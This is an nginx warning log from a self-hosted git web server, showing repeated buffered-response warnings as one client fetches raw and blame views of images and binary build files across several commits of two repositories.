2026/02/17 13:39:41 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/07/0000014075 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png"
2026/02/17 13:39:45 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/07/0000014076 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html"
2026/02/17 13:39:48 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/07/0000014077 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html"
2026/02/17 13:39:50 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/07/0000014078 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html"
2026/02/17 13:39:57 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/07/0000014079 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png"
2026/02/17 13:40:04 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/08/0000014080 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png"
2026/02/17 13:40:11 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/08/0000014081 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png"
2026/02/17 13:40:19 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/08/0000014082 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png"
2026/02/17 13:40:26 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/08/0000014083 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png"
2026/02/17 13:40:34 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/08/0000014084 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png"
2026/02/17 13:40:38 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/08/0000014085 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png"
2026/02/17 13:40:42 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/08/0000014086 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html"
2026/02/17 13:40:52 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/08/0000014087 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png"
2026/02/17 13:40:58 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/08/0000014088 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png"
2026/02/17 13:41:06 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/08/0000014089 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png"
2026/02/17 13:41:14 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/09/0000014090 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png"
2026/02/17 13:41:20 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/09/0000014091 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png"
2026/02/17 13:41:27 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/09/0000014092 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png"
2026/02/17 13:41:34 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/09/0000014093 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png"
2026/02/17 13:41:38 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/09/0000014094 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png"
2026/02/17 13:41:53 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/09/0000014095 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png"
2026/02/17 13:42:00 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/09/0000014096 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png"
2026/02/17 13:42:08 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/09/0000014097 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png"
2026/02/17 13:42:15 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/09/0000014098 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png"
2026/02/17 13:42:22 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/09/0000014099 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png"
2026/02/17 13:42:29 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/10/0000014100 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png"
2026/02/17 13:42:35 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/10/0000014101 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png"
2026/02/17 13:42:36 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/10/0000014102 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png"
2026/02/17 13:45:36 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/10/0000014103 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg"
2026/02/17 13:46:18 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/10/0000014104 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe"
2026/02/17 13:46:22 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/10/0000014105 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe"
2026/02/17 13:46:33 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/10/0000014106 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe"
2026/02/17 13:46:36 [warn] 920#920: *50239 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/10/0000014107 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe"
2026/02/17 13:47:01 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/10/0000014108 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico"
2026/02/17 13:47:34 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/10/0000014109 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip"
2026/02/17 13:47:39 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/11/0000014110 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip"
2026/02/17 13:47:55 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/11/0000014111 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png"
2026/02/17 13:48:24 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/11/0000014112 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe"
2026/02/17 13:51:03 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/11/0000014113 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg"
2026/02/17 13:51:40 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/11/0000014114 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe"
2026/02/17 13:52:11 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/11/0000014115 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll"
2026/02/17 13:52:18 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/11/0000014116 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll"
